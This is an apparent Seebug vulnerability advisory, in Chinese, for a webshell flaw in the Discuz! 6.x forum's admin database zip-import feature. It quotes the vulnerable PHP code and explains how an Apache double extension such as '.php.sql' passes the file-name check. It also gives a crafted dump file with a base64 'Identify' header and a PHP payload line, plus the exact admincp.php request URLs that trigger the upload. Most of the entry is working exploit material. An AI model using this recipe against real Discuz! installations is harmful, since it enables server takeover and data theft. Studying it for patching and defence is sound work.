Discuz! admin/database.inc.php get-webshell bug

2008-11-28T00:00:00
ID SSV:4505
Type seebug
Reporter Root
Modified 2008-11-28T00:00:00

Description

由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell.<br /> 在文件admin\database.inc.php里代码:<br /> .....<br /> elseif($operation == 'importzip') {<br /> <br /> require_once DISCUZ_ROOT.'admin/zip.func.php';<br /> $unzip = new SimpleUnzip();<br /> $unzip->ReadFile($datafile_server);<br /> if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/.sql$/i", $importfile = $unzip->GetName(0))) {<br /> cpmsg('database_import_file_illegal', '', 'error');<br /> }<br /> <br /> $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s(\w+)./s", "\1", substr($unzip->GetData(0), 0, 256))));<br /> $confirm = !empty($confirm) ? 1 : 0;<br /> if(!$confirm && $identify[1] != $version) {<br /> cpmsg('database_import_confirm', 'admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form');<br /> }<br /> <br /> $sqlfilecount = 0;<br /> foreach($unzip->Entries as $entry) {<br /> if(preg_match("/.sql$/i", $entry->Name)) {<br /> $fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w');<br /> fwrite($fp, $entry->Data);<br /> fclose($fp);<br /> $sqlfilecount++;<br /> }<br /> }<br /> ......<br /> <br /> 注意2点<br /> 1. preg_match("/.sql$/i", $importfile = $unzip->GetName(0)) 可以利用apache的特性如081127_k4pFUs3C-1.php.sql这样类似的文件.<br /> 2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s(\w+)./s", "\1", substr($unzip->GetData(0), 0, 256)))); 所以要注意文件格式:[可以先备用下然后修改打包为zip]<br /> <br />

Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ==<br />

<?phpinfo();?><br />

<?exit();?><br />

Discuz! Multi-Volume Data Dump Vol.1<br />

Version: Discuz! 6.1.0<br />

Time: 2008-11-27 11:38<br />

Type: discuz<br />

Table Prefix: cdb_

Discuz! 6.1.0 暂无

                                        
                                            
                                                提交:

&lt;6.0 :admincp.php?action=importzip&amp;datafile_server=./附件路径/附件名.zip&amp;importsubmit=yes
=6.1 :admincp.php?action=database&amp;operation=importzip&amp;datafile_server=./附件路径/附件名称.zip&amp;importsubmit=yes&amp;frames=yes